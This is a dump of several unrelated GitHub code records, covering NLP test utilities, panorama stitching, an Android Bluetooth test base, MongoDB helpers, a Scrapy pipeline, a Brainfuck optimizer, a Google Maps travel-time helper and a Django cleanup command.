\"b\", \"c\"]))\n\n @unittest.mock.patch(\"lib.utils.read_save\")\n def test_add_text(self, mock_read_save):\n\n mock_read_save.return_value = \"Das ist ein Test\"\n mock_read_save.nlp = (\"Das\", \"ist\", \"ein\", \"Test\")\n mock_obj = unittest.mock.Mock()\n mock_obj.lang = \"de\"\n mock_obj.corpus_df = pd.DataFrame({\"file_path\": [\"foo/a/Training.test\",\n \"foo/b/Training.test\"]})\n output = utils.TrainingData.add_text(mock_obj)\n self.assertTrue(list(output[\"text\"]) == [\"Das ist ein Test\", \"Das ist ein Test\"])\n\n def test_to_sentences(self):\n\n mock_obj = unittest.mock.Mock()\n a = collections.namedtuple(\"doc\",\"sents\")\n b = a(sents=[[\"Das\", \"ist\", \"ein\", \"Test\", \".\"], [\"Das\", \"auch\", \".\"]])\n\n\n mock_obj.corpus_df = pd.DataFrame({\"tokens\": [b]})\n\n output = utils.TrainingData.to_sentences(mock_obj)\n self.assertTrue(list(output[\"sentences\"]) == [[[\"Das\", \"ist\", \"ein\", \"Test\", \".\"], [\"Das\", \"auch\", \".\"]]])\n\n def test_to_chunks(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.chunk_scope = \"test\"\n mock_obj.chunk_size = 2\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[None] * 6]})\n\n output = utils.TrainingData.to_chunks(mock_obj)\n self.assertTrue(list(output[\"test_chunks\"]) == [[[None, None], [None, None], [None, None]]])\n\n def test_to_chars(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"text\": [\"test\", \"tset\"]})\n output = utils.TrainingData.to_chars(mock_obj)\n self.assertTrue(list(output[\"characters\"]) == [[\"t\", \"e\", \"s\", \"t\"], [\"t\", \"s\", \"e\", \"t\"]])\n\n def test_to_ngrams(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.scope = \"test\"\n mock_obj.gram_size = 3\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[\"t\", \"e\", \"s\", \"t\"], [\"t\", \"s\", \"e\", \"t\"]]})\n output = utils.TrainingData.to_ngrams(mock_obj)\n self.assertTrue(list(output[\"test_ngrams\"]) == [[(\"t\", \"e\", \"s\"), (\"e\", \"s\", \"t\")],\n [(\"t\", \"s\", \"e\"), (\"s\", \"e\", \"t\")]])\n\n def test_generate_one_hot_matrix(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.scope = \"test\"\n mock_obj.num_words = 3\n mock_obj.corpus_df = pd.DataFrame({\"test\": [\"Ein Test\"]})\n\n output = utils.TrainingData.generate_one_hot_matrix(mock_obj)\n self.assertTrue(list(output[\"one_hot\"][0].flatten()) == [0., 1., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 1., 0., 1., 0., 0., 0.,\n 0., 0., 0., 1.])\n\n def test_generate_sequences(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.sequence_scope = \"test\"\n mock_obj.num_words = 5\n\n mock_obj2 = unittest.mock.Mock()\n mock_obj2.text = \"Ein Text\"\n\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[mock_obj2]]})\n\n output = utils.TrainingData.generate_sequences(mock_obj)\n self.assertTrue(list(output[\"sequences\"]) == [[[1, 2]]])\n\n def test_padding_sequences(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.maxlen = 8\n mock_obj.corpus_df = pd.DataFrame({\"sequences\": [[[1, 3, 4, 4, 1, 2],\n [1, 3, 4, 2, 1, 2]]]})\n output = utils.TrainingData.padding_sequences(mock_obj)\n self.assertTrue(list(output[\"sequences\"][0].flatten()) == [1, 3, 4, 4, 1, 2, 0, 0, 1, 3, 4, 2, 1, 2, 0, 0])\n\n def test_to_categorical_trainingdata(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.categorical_scope = \"test\"\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[1, 1, 4], [2, 4, 3], [3, 4, 5], [4, 6, 7]],\n \"Categories\": [\"a\", \"b\", \"a\", \"b\"]})\n\n x, y = utils.TrainingData.to_categorical_trainingdata(mock_obj)\n\n self.assertTrue(list(x) == [1, 1, 4, 2, 4, 3, 3, 4, 5, 4, 6, 7] and\n list(y) == [0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1])\n\n def test_split_training_data(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.X = [[0], [0], [1], [1]]\n mock_obj.Y = [[1], [1], [2], [2]]\n mock_obj.ratio = 0.25\n x_train, x_test, y_train, y_test = utils.TrainingData.split_training_data(mock_obj)\n\n self.assertTrue(len(x_train) == 3 and\n len(x_test) == 1 and\n len(y_train) == 3 and\n len(y_test) == 1)\n\n @unittest.mock.patch(\"lib.utils.read_save\")\n def test_load_sequential_data(self, mock_read_save):\n\n mock_read_save.return_value = \"Das\\t0\\nist\\t0\\nein\\t1\\nTest\\t1\\n\"\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"file_path\": [\"foo/a/Training.test\",\n \"foo/b/Training.test\"]})\n output = utils.TrainingData.load_sequential_data(mock_obj)\n\n self.assertTrue(output[\"text\"][0] == [\"Das\", \"ist\", \"ein\", \"Test\"] and\n output[\"sequence_label\"][1] == ['0', '0', '1', '1'])\n\n @unittest.mock.patch(\"lib.utils.context_grabber\")\n def test_add_sequential_context(self, mock_context_grabber):\n\n mock_context_grabber.return_value = ['padder padder padder a b c padder',\n 'padder padder a b c padder padder',\n 'padder a b c padder padder padder']\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"text\": [\"test\"]})\n\n\n output = utils.TrainingData.add_sequential_context(mock_obj)\n self.assertTrue(output[\"sequence_training\"][0] == ['padder padder padder a b c padder',\n 'padder padder a b c padder padder',\n 'padder a b c padder padder padder'])\n\n @unittest.mock.patch(\"lib.utils.fill_parameters\")\n @unittest.mock.patch(\"lib.utils.single_run_paramsearch\")\n def test_td_paramsearch(self, mock_single_run_paramsearch, mock_fill_parameters):\n\n mock_single_run_paramsearch.return_value = {\"score\": 1}\n\n mock_fill_parameters.return_value = {\"chunk_scope\": [\"test\"], \"num_words\": [3], \"file_ending\": [\"txt\"],\n \"folder\": [\"test\"],\n \"windowsize\": [4, 8], \"ratio\": [0.1], \"maxlen\": [6], \"gram_size\": [3],\n \"chunk_size\": [0], \"lang\": [\"de\"], \"sequence_scope\": [\"test\"],\n \"categorical_scope\": [\"test\"]}\n\n output = utils.td_paramsearch([], [], [])\n self.assertTrue(any(output == [{'score': 1}, {'score': 1}]))\n\n @unittest.mock.patch(\"lib.utils.TrainingData\")\n def test_single_run_paramsearch(self, mock_init):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.x_train = [0]\n\n mock_init.return_value = mock_obj\n\n mock_obj2 = unittest.mock.Mock()\n mock_obj2.score = lambda x, y: 1\n mock_obj2.fit = lambda x, y: 1\n\n output = utils.single_run_paramsearch([], [mock_obj2], [], [], [], [], [], [], [], [], [], [], [], [])\n self.assertTrue(set(output[0].keys()) == set(['maxlen', 'lang', 'ratio', 'file_ending', 'classifier',\n 'chunk_size',\n 'score', 'num_words', 'sequence_scope', 'categorical_scope',\n 'chunk_scope', 'folder', 'windowsize', 'gram_size']))\n\n\n\n\n\n\n","repo_name":"LeKonArD/TfDPy","sub_path":"testing/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18858184395","text":"import json\nimport os\n\nimport cv2\nimport numpy as np\n\nfrom blend import ImageInfo, blendImages\nfrom feature import get_mapping\nfrom warp import warp_spherical\n\n\ndef load_images(dirpath):\n \"\"\"\n Load images from the dirpath\n :param dirpath containing a series of images\n :return: list of cv2 images\n \"\"\"\n if not dirpath:\n return\n files = sorted(os.listdir(dirpath))\n files = [\n f for f in files\n if f.endswith('.jpg') or f.endswith('.png') or f.endswith('.ppm')\n ]\n images = [cv2.imread(os.path.join(dirpath, i)) for i in files]\n print('Load {0} images successfully!'.format(len(images)))\n return images\n\n\ndef warp_images(images, f=595, k1=-0.15, k2=0.0):\n \"\"\"\n warp images to spherical coordinates.\n :return: warpped images list\n \"\"\"\n return [\n warp_spherical(img, f, k1, k2) for img in images\n ]\n\n\nimgs = load_images('panorama')\nwarpped = warp_images(imgs)\n\n\nt = np.eye(3)\ninfo = []\nT = []\nfor i in range(len(warpped)-1):\n print('Computing mapping from {0} to {1}'.format(i, i+1))\n info.append(ImageInfo('', warpped[i], np.linalg.inv(t)))\n tmp = get_mapping(warpped[i], warpped[i+1])\n print(tmp)\n t = tmp.dot(t)\n T.append(tmp)\n\ninfo.append(ImageInfo('', warpped[len(warpped)-1], np.linalg.inv(t)))\nprint('Computing mapping from {0} to {1}'.format(len(warpped)-1, 0))\ntmp = get_mapping(warpped[len(warpped)-1], warpped[0])\nprint(tmp)\nt = tmp.dot(t)\ninfo.append(ImageInfo('', warpped[0], np.linalg.inv(t)))\n\n# json.dump(T, fp=open('transform_output.json','w'), indent=4)\nprint('Blending Images.')\npanorama = blendImages(info, blendWidth=50, is360=True)\ncv2.imwrite('Panorama.jpg', panorama)\n","repo_name":"3288103265/ImgStitching","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73407022239","text":"import os\nimport time\nimport traceback\nfrom acts import utils\nfrom acts.base_test import BaseTestClass\nfrom acts.signals import TestSignal\nfrom acts.utils import set_location_service\nfrom acts.controllers import android_device\nfrom acts.test_utils.bt.bt_test_utils import (\n reset_bluetooth, setup_multiple_devices_for_bt_test, take_btsnoop_logs)\nfrom acts.utils import sync_device_time\nimport threading\n\n\nclass BluetoothBaseTest(BaseTestClass):\n DEFAULT_TIMEOUT = 10\n start_time = 0\n timer_list = []\n\n def __init__(self, controllers):\n BaseTestClass.__init__(self, controllers)\n\n # Use for logging in the test cases to facilitate\n # faster log lookup and reduce ambiguity in logging.\n @staticmethod\n def bt_test_wrap(fn):\n def _safe_wrap_test_case(self, *args, **kwargs):\n test_id = \"{}:{}:{}\".format(self.__class__.__name__, fn.__name__,\n time.time())\n log_string = \"[Test ID] {}\".format(test_id)\n self.log.info(log_string)\n try:\n for ad in self.android_devices:\n ad.droid.logI(\"Started \" + log_string)\n result = fn(self, *args, **kwargs)\n for ad in self.android_devices:\n ad.droid.logI(\"Finished \" + log_string)\n if result is not True and \"bt_auto_rerun\" in self.user_params:\n self.teardown_test()\n log_string = \"[Rerun Test ID] {}. 1st run failed.\".format(\n test_id)\n self.log.info(log_string)\n self.setup_test()\n for ad in self.android_devices:\n ad.droid.logI(\"Rerun Started \" + log_string)\n result = fn(self, *args, **kwargs)\n if result is True:\n self.log.info(\"Rerun passed.\")\n elif result is False:\n self.log.info(\"Rerun failed.\")\n else:\n # In the event that we have a non-bool or null\n # retval, we want to clearly distinguish this in the\n # logs from an explicit failure, though the test will\n # still be considered a failure for reporting purposes.\n self.log.info(\"Rerun indeterminate.\")\n result = False\n return result\n except TestSignal:\n raise\n except Exception as e:\n self.log.error(traceback.format_exc())\n self.log.error(str(e))\n return False\n return fn(self, *args, **kwargs)\n\n return _safe_wrap_test_case\n\n def _reboot_device(self, ad):\n self.log.info(\"Rebooting device {}.\".format(ad.serial))\n ad = ad.reboot()\n\n def setup_class(self):\n if \"reboot_between_test_class\" in self.user_params:\n threads = []\n for a in self.android_devices:\n thread = threading.Thread(\n target=self._reboot_device, args=([a]))\n threads.append(thread)\n thread.start()\n for t in threads:\n t.join()\n for a in self.android_devices:\n set_location_service(a, False)\n sync_device_time(a)\n return setup_multiple_devices_for_bt_test(self.android_devices)\n\n def setup_test(self):\n self.timer_list = []\n for a in self.android_devices:\n a.ed.clear_all_events()\n return True\n\n def teardown_test(self):\n return True\n\n def on_fail(self, test_name, begin_time):\n self.log.debug(\n \"Test {} failed. Gathering bugreport and btsnoop logs\".format(\n test_name))\n take_btsnoop_logs(self.android_devices, self, test_name)\n self._take_bug_report(test_name, begin_time)\n for _ in range(5):\n if reset_bluetooth(self.android_devices):\n break\n else:\n self.log.error(\"Failed to reset Bluetooth... retrying.\")\n return\n\n def _take_bug_report(self, test_name, begin_time):\n if \"no_bug_report_on_fail\" in self.user_params:\n return\n\n # magical sleep to ensure the runtime restart or reboot begins\n time.sleep(1)\n for ad in self.android_devices:\n try:\n ad.adb.wait_for_device()\n ad.take_bug_report(test_name, begin_time)\n tombstone_path = os.path.join(\n ad.log_path, \"BugReports\",\n \"{},{}\".format(begin_time, ad.serial).replace(' ', '_'))\n utils.create_dir(tombstone_path)\n ad.adb.pull('/data/tombstones/', tombstone_path)\n except:\n self.log.error(\"Failed to take a bug report for {}, {}\"\n .format(ad.serial, test_name))\n\n def _get_time_in_milliseconds(self):\n return int(round(time.time() * 1000))\n\n def start_timer(self):\n self.start_time = self._get_time_in_milliseconds()\n\n def end_timer(self):\n total_time = self._get_time_in_milliseconds() - self.start_time\n self.timer_list.append(total_time)\n self.start_time = 0\n return total_time\n\n def log_stats(self):\n if self.timer_list:\n self.log.info(\"Overall list {}\".format(self.timer_list))\n self.log.info(\"Average of list {}\".format(\n sum(self.timer_list) / float(len(self.timer_list))))\n self.log.info(\"Maximum of list {}\".format(max(self.timer_list)))\n self.log.info(\"Minimum of list {}\".format(min(self.timer_list)))\n self.log.info(\"Total items in list {}\".format(len(\n self.timer_list)))\n self.timer_list = []\n","repo_name":"IHNEL/AOSP_RK3128_Full","sub_path":"rk3128/tools/test/connectivity/acts/framework/acts/test_utils/bt/BluetoothBaseTest.py","file_name":"BluetoothBaseTest.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"4473616571","text":"import datetime as dt\n\nimport pymongo\nfrom bson.codec_options import CodecOptions\n\nfrom . import constants, settings\nfrom .caching import cache\n\nSORT_KEY = [\n (\"blockNumber\", pymongo.ASCENDING),\n (\"transactionIndex\", pymongo.ASCENDING),\n (\"logIndex\", pymongo.ASCENDING),\n]\n\n\nclient = pymongo.MongoClient(settings.DATABASE_URL)\ndb = client.get_database()\n\n\ndef create_indices():\n db.events.create_index(\"event\")\n db.events.create_index(\"address\")\n\n db.events.create_index(SORT_KEY, unique=True)\n\n for key in [\"minter\", \"redeemer\", \"borrower\"]:\n db.events.create_index(f\"returnValues.{key}\")\n\n db.dsr.create_index(\"blockNumber\", unique=True)\n\n db.ds_values.create_index(\"blockNumber\", unique=True)\n db.ds_values.create_index(\"address\")\n\n db.chi_values.create_index(\"blockNumber\", unique=True)\n\n db.blocks.create_index(\"blockNumber\", unique=True)\n\n db.prices.create_index(\"blockNumber\", unique=True)\n\n\ndef iterate_events():\n return db.events.find().sort(SORT_KEY)\n\n\ndef count_events():\n return db.events.count_documents({})\n\n\n@cache(constants.DAY)\ndef get_block_dates():\n projection = {\"_id\": False, \"blockNumber\": True, \"timestamp\": True}\n return {\n b[\"blockNumber\"]: dt.datetime.fromtimestamp(\n int(b[\"timestamp\"]), dt.timezone.utc\n )\n for b in db.blocks.find(projection=projection)\n }\n\n\ndef prices():\n options = CodecOptions(tz_aware=True)\n return db.get_collection(\"prices\", codec_options=options)\n","repo_name":"merofinance/analyzer","sub_path":"backd/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"51"} +{"seq_id":"33276974369","text":"class Solution:\n def intersect(self, nums1: list[int], nums2: list[int]) -> list[int]:\n \"\"\"\n >>> Solution().intersect([1,2,2,1], [2,2])\n [2, 2]\n \"\"\"\n res = []\n dont = set()\n for each in nums1:\n n2c = nums2.count(each)\n if(each not in dont and n2c>0):\n res = res + [each]*min(n2c, nums1.count(each))\n dont.add(each)\n return res\n \n\n \n \n\n \nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(verbose=True)","repo_name":"Evan-Bell/leetcode","sub_path":"python3/350. Intersection of Two Arrays II.py","file_name":"350. Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39609366261","text":"# https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV189xUaI8UCFAZN\n\nimport sys\nsys.stdin = open(\"SW Expert Academy/220720/1284_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(1, T + 1):\n P, Q, R, S, W = map(int, input().split())\n \n # A사\n result_a = W * P\n # B사\n result_b = 0\n if W <= R:\n result_b = Q\n else:\n result_b = Q + (W - R) * S\n\n if result_a >= result_b:\n print(f'#{test_case} {result_b}')\n else:\n print(f'#{test_case} {result_a}')\n","repo_name":"snnzzoo/Python-Practice","sub_path":"SW Expert Academy/220720/1284_수도요금경쟁.py","file_name":"1284_수도요금경쟁.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24002196123","text":"from parser_bf import *\n\n\"\"\"\nNOTE: \n The 3rd optimization: Increments/decrements at a fixed offset\n is automatically dealt with in my implementation of Postponing Movements\n\n The 5th optimization: Assignments Cancellation\n are also automatically dealt with thanks to my code architecture\n\n The 7th optimization: Copy/multiply loop simplification\n for this, in our code architecture, we can only have increment instructions in the loop\n\n\"\"\"\n\n# --------------------------------------------------------------------\n# Macros\n# --------------------------------------------------------------------\n\nclass Macros:\n \"\"\" class of macros used in the compiler \"\"\"\n all_ops = [BFIncrement, BFPointer]\n input_output = [BFInput, BFPrint]\n\n# --------------------------------------------------------------------\n# Optimizer Class\n# --------------------------------------------------------------------\n\nclass Optimizer:\n \"\"\" Optimizes the brainfuck instrs \"\"\"\n\n def __init__(self, block: BFBlock) -> None:\n self.__block : BFBlock = block\n self.__block_instr : List(BFInstruction) = block.block\n self.__instr_len : int = len(self.__block_instr)\n self.__incr_counter : int = None\n self.__ptr_counter : int = None\n self.__optimize()\n\n block : BFBlock = property(lambda self : self.__block)\n block_instr : List[BFInstruction] = property(lambda self : self.__block_instr)\n\n def __clean(self, instr_set : List[BFInstruction]) -> BFBlock:\n \"\"\" Removes dead instr with 0 value \"\"\"\n new_instr = list()\n for instr in instr_set:\n if type(instr) in Macros.all_ops: # look for dead instr\n if instr.value != 0:\n new_instr.append(instr)\n\n elif isinstance(instr, BFLoop): # iterate through BFLoop instructions\n if len(instr.body.block) > 0:\n new_instr.append(BFLoop(self.__clean(instr.body.block), instr.id))\n\n else: # append all other instructions\n new_instr.append(instr)\n\n return BFBlock(new_instr)\n\n def __reverse(self, instr_set : List[BFInstruction]) -> None:\n \"\"\" Reverses Increment and Pointer instr so that incr happens before ptr movement \"\"\"\n for index, instr in enumerate(instr_set):\n # if a pointer then check for switching\n if isinstance(instr, BFPointer):\n if index+1 < len(instr_set):\n next_instr = instr_set[index+1]\n # if next instr is incr then switch\n if isinstance(next_instr, BFIncrement):\n # print(\"reversed\")\n instr_set[index], instr_set[index+1] = next_instr, instr\n if isinstance(instr, BFLoop):\n # print(\"reached loop\")\n self.__reverse(instr.body.block)\n\n # --------------------------------------------------------------------\n # Optimizations\n # --------------------------------------------------------------------\n\n def __optimize(self) -> None:\n \"\"\" Runs all optimizations \"\"\"\n # run contraction optimizations\n self.__opt_add_sub(self.__block_instr)\n # clean null instr\n self.__block = self.__clean(self.__block_instr)\n self.__block_instr = self.__block.block\n print(\"Contraction performed\")\n \n # run postpone optimizations\n self.__opt_postpone(self.__block_instr)\n # clean null instr\n self.__block = self.__clean(self.__block_instr)\n self.__block_instr = self.__block.block\n # reverse ptr and incr instr\n self.__reverse(self.__block_instr)\n print(\"Postponing performed\")\n\n # run scan loop simplification\n self.__opt_scan_loop(self.__block_instr)\n # exit(0)\n print(\"Scan inf loop performed\")\n\n # run copy loop simplification\n unused = self.__opt_loop(self.__block_instr)\n if unused: print(\"This is a loopless simplifiable program\")\n print(\"Simplifiable loop checked\\n\")\n\n def optimize_two(self) -> None:\n # run postpone optimizations\n self.__opt_postpone(self.__block_instr)\n # clean null instr\n self.__block = self.__clean(self.__block_instr)\n self.__block_instr = self.__block.block\n # reverse ptr and incr instr\n self.__reverse(self.__block_instr)\n\n # --------------------------------------------------------------------\n # Contraction optimizations\n\n def __opt_add_sub(self, instr_set: List[BFInstruction]) -> None:\n \"\"\" Contracts incr/decr instr \"\"\"\n instr_len = len(instr_set)\n index = 0\n\n while index < instr_len: # run through all instructions\n instr = instr_set[index]\n\n if isinstance(instr, BFIncrement): # update arith_ops\n # set the counter to initial value\n self.__incr_counter = instr.value\n while index+1 < instr_len: # iterate until end of list\n next_instr = instr_set[index+1]\n # if next instr not arith_op break\n if not isinstance(next_instr, BFIncrement):\n break\n # nullify the value of the current instr\n instr.change_val(0)\n # add the value of the next instruction\n # and reset the curr instr to next\n self.__incr_counter += next_instr.value\n instr = next_instr\n index += 1\n instr.change_val(self.__incr_counter)\n\n elif isinstance(instr, BFPointer): # update ptr_ops\n # set the counter to initial value\n self.__ptr_counter = instr.value\n while index+1 < instr_len: # iterate until end of list\n next_instr = instr_set[index+1]\n # if next instr not arith_op break\n if not isinstance(next_instr, BFPointer):\n break\n # nullify the value of the current instr\n instr.change_val(0)\n # add the value of the next instruction\n # and reset the curr instr to next\n self.__ptr_counter += next_instr.value\n instr = next_instr\n index += 1\n instr.change_val(self.__ptr_counter)\n\n elif isinstance(instr, BFLoop): # iterate through loop instr\n self.__opt_add_sub(instr.body.block)\n \n index += 1\n\n # --------------------------------------------------------------------\n # Postponing Movement\n\n def __opt_postpone(self, instr_set: List[BFInstruction]) -> None:\n \"\"\" Optimizations for movement postponing \"\"\"\n instr_len = len(instr_set)\n index = 0\n\n while index < instr_len: # iterate through all instr\n instr = instr_set[index]\n\n if isinstance(instr, BFPointer):\n last_ptr_instr = instr\n # set the ptr value\n self.__ptr_counter = instr.value\n while index+1 < instr_len:\n next_instr = instr_set[index+1]\n # if next instr not an incr or ptr then break\n if not type(next_instr) in Macros.all_ops:\n break\n if isinstance(next_instr, BFPointer):\n assert(isinstance(instr, BFIncrement)), f\"Instrs {instr, next_instr} not contracted!\"\n # update local ptr val\n self.__ptr_counter += next_instr.value\n # update last ptr as the latest ptr\n last_ptr_instr = next_instr\n elif isinstance(next_instr, BFIncrement):\n assert(isinstance(instr, BFPointer)), f\"Instrs {instr, next_instr} not contracted!\"\n # change dest ptr val for the incr instr\n next_instr.change_ptr(self.__ptr_counter)\n # reset ptr val for curr ptr\n instr.change_val(0)\n instr = next_instr\n index += 1\n last_ptr_instr.change_val(self.__ptr_counter)\n\n elif isinstance(instr, BFLoop): # iterate through loop instr\n # print(instr.body.block)\n # exit(0)\n self.__opt_postpone(instr.body.block)\n\n index += 1\n\n # --------------------------------------------------------------------\n # Scan loop simplification\n # TODO can be merged into opt_postpone\n\n def __opt_scan_loop(self, instr_set: List[BFInstruction]) -> None:\n \"\"\" Checks loops for potential inf loops modifies linear scanning \"\"\"\n for instr in instr_set:\n if isinstance(instr, BFLoop):\n loop_instr = instr.body.block\n if len(loop_instr) == 1:\n if isinstance(loop_instr[0], BFPointer) and abs(loop_instr[0].value) == 1:\n print(loop_instr[0].value)\n print(instr.id)\n instr.set_inf()\n else:\n self.__opt_scan_loop(loop_instr)\n\n # --------------------------------------------------------------------\n # Copy/multiply loop simplification\n # TODO can be merged into opt_postpone\n\n def __opt_loop(self, instr_set : List[BFInstruction]) -> bool:\n \"\"\" Checks if single assignment can be performed in the loop \"\"\"\n simplifiable = True\n self.__incr_counter = 0\n\n assert(len(instr_set)>0), f\"Instr {instr_set} should have been cleaned before\"\n if not (isinstance(instr_set[0], BFIncrement) \\\n and (instr_set[0].ptr, instr_set[0].value) == (0, -1)):\n simplifiable = False\n\n for instr in instr_set:\n if isinstance(instr, BFLoop):\n simplifiable = self.__opt_loop(instr.body.block)\n # if simplifiable:\n # print(instr.body)\n # print(simplifiable)\n instr.set_simplifiable(simplifiable)\n simplifiable = False # current loop is not simplifiable\n\n # In a simplifiable loop, ptr instr would have been removed before\n elif not isinstance(instr, BFIncrement):\n simplifiable = False\n\n return simplifiable\n\n\nif __name__ == \"__main__\":\n if len(sys.argv)-1 != 1:\n print(f'Usage: {sys.argv[0]} [FILE.bf]', file = sys.stderr)\n exit(1)\n\n program = parse_program(sys.argv[1])\n print(f\"program before opt: {program}\\n\")\n optimizer = Optimizer(program)\n print(f\"1st opt: {optimizer.block}\\n\")\n optimizer.optimize_two()\n print(f\"2nd opt: {optimizer.block}\\n\")\n\n BFExit\n","repo_name":"vrushank-agrawal/CSE302","sub_path":"lab6/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":10929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35513491600","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nfrom omim.items import OmimItem\n\n\nclass OmimPipeline(object):\n\n def open_spider(self, spider):\n self.header = 'prefix location gene genename gene_mim phenotype pheno_mim inheritance pheno_map_key pmids hgnc_symbol'.split()\n self.file = open(spider.outfile, 'w')\n self.file.write('\\t'.join(self.header) + '\\n')\n\n def close_spider(self, spider):\n self.file.close()\n spider.logger.info('\\033[32msave file: {}\\033[0m'.format(spider.outfile))\n\n def process_item(self, item, spider):\n if isinstance(item, OmimItem):\n line = '\\t'.join('{%s}' % each for each in self.header)\n line = line.format(**dict(item))\n self.file.write(line + '\\n')\n return item\n","repo_name":"suqingdong/MySpider","sub_path":"scrapy_project/omim/omim/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17662242680","text":"import googlemaps as gm\nimport json\nimport sys\nimport requests\nimport numpy as np\nimport urllib.parse\nfrom itertools import tee\nfrom geopandas import GeoDataFrame\n\n# Example of usage of the googlemaps API\ndef teste_gm(gmaps, times, n, origins, destinations):\n\tmode = \"driving\"\n\tunits = \"metric\"\n\tprint(len(origins), len(destinations))\n\tfor i in range(n):\n\t\tfor j in range(n):\n\t\t\tprint(i,j,times[i][j],end=\": \")\n\t\t\tresult = gmaps.distance_matrix(origins=origins[i],destinations=destinations[j], \n\t\t\t\tmode=mode, units=units)\n\t\t\tprint(result[\"rows\"][0][\"elements\"][0][\"duration\"][\"value\"])\n\n# Makes a travel time request on a partition of the data matrix\ndef make_req_gm(gmaps, indexes, times,from_,to_):\n\tmode = \"driving\"\n\tunits = \"metric\"\n\tresult = gmaps.distance_matrix(from_, to_, mode=mode, units=units)\n\tn = len(to_)\n\tfor i in range(len(indexes)):\n\t\tfor j in range(n):\n\t\t\ttimes[indexes[i]][j] = result[\"rows\"][i][\"elements\"][j][\"duration\"][\"value\"]\n\n\n# Recursively partitions the data matrix so the googlemaps API can handle it\ndef rec(gmaps, indexes, times, from_, to_):\n\tif len(to_) > 100:\n\t\traise ValueError()\n\telif len(from_)*len(to_) > 100:\n\t\tn = len(from_)\n\t\trec(gmaps, indexes[:n//2], times, from_[:n//2], to_)\n\t\trec(gmaps, indexes[n//2:], times, from_[n//2:], to_)\n\telse:\n\t\tmake_req_gm(gmaps, indexes, times,from_,to_)\n\n\n# Read a list of lat longs from the input file path and calls the recursive algorithm to\n# get the travel times\ndef get_googlemaps(path):\n\n\tgmaps = gm.Client(key=GG_KEY)\n\n\tarq = open(path,\"r\")\n\tn = int(arq.readline())\n\torigins = []\n\tdestinations = []\n\tfor line in arq.readlines():\n\t\tlat, longi = [float(x) for x in line.split()]\n\t\torigins.append((lat,longi))\n\t\tdestinations.append((lat,longi))\n\tarq.close()\n\n\ttimes = []\n\tfor i in range(n):\n\t\ttimes.append([0]*n)\n\trec(gmaps,range(n),times,origins,destinations)\n\treturn n,times\n\ndef gen_distance_matrix(origins, destinations):\n\t'''\n\t\tUse google maps' API to fetch distance matrix between origin and destination (lists of lat-long)\n\t'''\n\tif len(origins) != len(destinations):\n\t\traise ValueError()\n\t\n\tgmaps = gm.Client(key=GG_KEY)\n\n\ttimes = [] #numpy???\n\tfor i in range(n):\n\t\ttimes.append([0]*n)\n\trec(gmaps, range(n), times, origins, destinations)\n\n\treturn n, times","repo_name":"amk1710/DiscretizationBox","sub_path":"DiscretizationBox/travel_times/googlemaps.py","file_name":"googlemaps.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10385510275","text":"import os\nimport shutil\nimport glob\nfrom django.core.management.base import BaseCommand\nfrom app.plugins import build_plugins\n\ndef cleanup():\n # Delete all node_modules and build directories within plugins' public/ folders\n root = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"..\", \"..\"))\n for d in glob.glob(os.path.join(root, \"coreplugins\", \"**\", \"public\", \"node_modules\")):\n shutil.rmtree(d)\n print(\"R\\t\" + d)\n for d in glob.glob(os.path.join(root, \"coreplugins\", \"**\", \"public\", \"build\")):\n shutil.rmtree(d)\n print(\"R\\t\" + d)\n\n print(\"Cleanup done!\")\n\nclass Command(BaseCommand):\n requires_system_checks = []\n \n def add_arguments(self, parser):\n super(Command, self).add_arguments(parser)\n\n def handle(self, **options):\n cleanup()\n 